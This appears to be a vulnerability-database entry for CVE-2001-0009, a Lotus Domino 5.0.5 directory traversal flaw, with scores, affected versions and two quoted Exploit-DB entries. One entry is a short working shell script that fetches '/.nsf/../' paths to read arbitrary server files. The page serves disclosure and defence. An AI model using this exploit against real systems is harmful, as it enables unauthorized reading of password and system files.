CVE-2001-0009
published 2001-02-12CVE-2001-0009: Directory traversal vulnerability in Lotus Domino 5.0.5 web server allows remote attackers to read arbitrary files via a .. attack.
PriorityP430medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
9.34%
94.8th percentile
Directory traversal vulnerability in Lotus Domino 5.0.5 web server allows remote attackers to read arbitrary files via a .. attack.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lotus | domino_server | — | — |
| lotus | domino_server | — | — |
| lotus | domino_server | — | — |
| lotus | domino_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Lotus Domino Server 5.0.x - Directory Traversal (1)
exploitdb·2001-01-15
CVE-2001-0009 Lotus Domino Server 5.0.x - Directory Traversal (1)
Lotus Domino Server 5.0.x - Directory Traversal (1)
---
source: https://www.securityfocus.com/bid/2173/info
It is possible for a remote user to gain access to any known file residing on the Lotus Domino Server 5.0.6 and previous. A specially crafted HTTP request comprised of '.nsf' and '../' along with the known filename, will display the contents of the particular file with read permissions.
Successful exploitation of this vulnerability could enable a remote user to gain access to systems files, password files, etc. This could lead to a complete compromise of the host.
#!/usr/bin/perl
# PERL script to test a Domino server for directory
# traversal vulnerability. (BugTraq ID 2173,
# https://www.securityfocus.com/bid/2173)
#
# Michael Smith, http://www.netlocksmith.com
# 01/15/2001
#
#
Exploit-DB
Lotus Domino Server 5.0.x - Directory Traversal (2)
exploitdb·2001-01-05
CVE-2001-0009 Lotus Domino Server 5.0.x - Directory Traversal (2)
Lotus Domino Server 5.0.x - Directory Traversal (2)
---
source: https://www.securityfocus.com/bid/2173/info
It is possible for a remote user to gain access to any known file residing on the Lotus Domino Server 5.0.6 and previous. A specially crafted HTTP request comprised of '.nsf' and '../' along with the known filename, will display the contents of the particular file with read permissions.
Successful exploitation of this vulnerability could enable a remote user to gain access to systems files, password files, etc. This could lead to a complete compromise of the host.
#!/bin/sh
HOST=$1
PATH=$2
start()
{
/usr/bin/lynx -dump http://$HOST/.nsf/../$PATH
}
if [ -n "$HOST" ]; then
start
else
echo "$0 "
fi
No writeups or analysis indexed.
http://www.osvdb.org/1703http://www.securityfocus.com/archive/1/154537http://www.securityfocus.com/archive/1/155124http://www.securityfocus.com/bid/2173https://exchange.xforce.ibmcloud.com/vulnerabilities/5899http://www.osvdb.org/1703http://www.securityfocus.com/archive/1/154537http://www.securityfocus.com/archive/1/155124http://www.securityfocus.com/bid/2173https://exchange.xforce.ibmcloud.com/vulnerabilities/5899
2001-02-12
Published